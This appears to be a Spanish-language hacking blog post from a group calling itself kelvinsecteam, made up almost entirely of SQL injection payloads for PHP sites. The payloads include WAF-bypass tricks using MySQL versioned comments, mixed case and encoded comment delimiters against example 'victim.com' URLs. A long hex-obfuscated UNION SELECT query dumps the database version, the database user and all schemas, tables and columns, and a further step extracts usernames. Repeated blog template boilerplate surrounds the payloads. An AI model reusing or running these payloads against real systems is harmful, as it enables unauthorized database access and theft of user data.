<Infirnatica.Edu></Infirnatica.Edu>

Mipagina.php?id=12’ /*!50000uNioN*//*!50000sElEcT*/1,2,3,4,5,6--+
Si no da entonce ponemos esta

Unión all select 1,1,1,1,1,1--
Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…

php?id=1+and+1=0+order+by+1

+andHYPERLINK "http://www.site.com/index.php?page_id=-15+and+(select"+(HYPERLINK "http://www.site.com/index.php?page_id=-15+and+(select"select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*

Mipagina.php?id=12’ /*!00000union*/select+1,2,3,4,5,6---+
Donde va la tabla 2 por ejemplo
" Mipagina.php?id=12’/*!50000uNioN*//*!50000sElEcT*/1, /*!00000concat*/(0x3c666f6e7420636f6c6f723d7265642073697a653d306d34726b6d336e2020477265657473203a2052756d6d79204b68616e202c4b616d72616e20536861682c4d616b204d616e2c4d6174746865772046657272656c6c202620616c6c20544353206d656d62657273203c2f666f6e743e,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5,6--+

" Muestra la table Image

Despues: Mipagina.php?id=12’/*!50000uNioN*//*!50000sElEcT*/1,(username),3,4,5,6

[In]Seguridad Informática

Pages

0 comentarios:

Publicar un comentario

Seguidores

Contribuyentes

Blog Archive

Blogger

kelvinsecteam

Blog Archive

Administrator

Tempo
Yei Zeta
Killer
Antoni zanx
Anoncol
Gjpst Ampu

About

iN

Blogger templates

Blogroll

About

[In]Seguridad Informática

Pages

0 comentarios:

Publicar un comentario

Seguidores

Contribuyentes

Blog Archive

Blogger

kelvinsecteam

Blog Archive

Administrator

Tempo Yei Zeta Killer Antoni zanx Anoncol Gjpst Ampu

About

iN

Blogger templates

Blogroll

About

Tempo
Yei Zeta
Killer
Antoni zanx
Anoncol
Gjpst Ampu